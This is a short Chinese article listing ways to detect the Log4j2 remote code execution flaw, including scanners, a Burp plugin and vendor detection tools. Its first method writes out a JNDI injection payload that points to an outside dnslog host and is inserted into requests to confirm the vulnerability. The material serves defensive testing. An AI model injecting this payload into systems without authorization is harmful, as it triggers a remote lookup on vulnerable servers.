Log4j2 漏洞檢測工具清單

距離Log4j2漏洞公開已經過去一個月了，它所造成的嚴重影響已經不需要我們重復提及了。隨著時間的推移，新的漏洞會不斷出現，舊的漏洞會不斷消失，而這個Log4j2中的RCE漏洞可能需要好幾年的時間才能得到解決。所以，在接下來的一段時間里，這個漏洞依然是我們需要去關注的重點。

本文收集和整理了幾種漏洞檢測方式和工具，以用于Log4j2漏洞檢測和自查。

1、dnslog手動驗證方法

首先在dnslog平臺獲取一個子域名，嘗試構造payload，插入請求數據包。

${jndi:ldap://bypass.fzuqgl.ceye.io}

通過dnslog平臺是否收到請求，初步判斷目標環(huán)境是否存在漏洞。

2、Log4j-scan

一款用于查找log4j2漏洞的python腳本，支持url檢測，支持HTTP請求頭和POST數據參數進行模糊測試。

github項目地址：

https://github.com/fullhunt/log4j-scan

3、Log4j2 burp被動掃描插件

通過插件的方式，將lLog4j2漏洞檢測能力集成到burp，從而提升安全測試人員的漏洞發(fā)現能力。

github項目地址：

https://github.com/f0ng/log4j2burpscanner

Log4j2 burp被動掃描插件效果：

4、AWVS掃描log4j2漏洞

AWVS14最新版本支持Log4j2漏洞檢測，支持批量掃描，漏洞掃描神器是不會讓你失望的，準備更新武器庫吧。

5、制品級Log4j2漏洞檢測工具

本檢測工具基于騰訊安全的binAuditor，支持 Jar/Ear/War包上傳，一鍵上傳即可獲取到檢測結果。

檢測地址：

https://bsca.ms.qq.com/

Jar包檢測結果：

6、Log4j2 本地檢測工具

基于長亭牧云產品提取出來的Log4j2本地檢測工具，可快速發(fā)現當前服務器存在風險的 log4j2 應用。

Log4j2 漏洞檢測工具地址：

https://log4j2-detector.chaitin.cn/

7、360 Log4j2檢測工具包

瀏覽器被動式掃描+本地檢測工具，提供了一個完整的Log4j2漏洞檢測方案，另外，工具包還包含了Log4j2補丁方案，如下圖：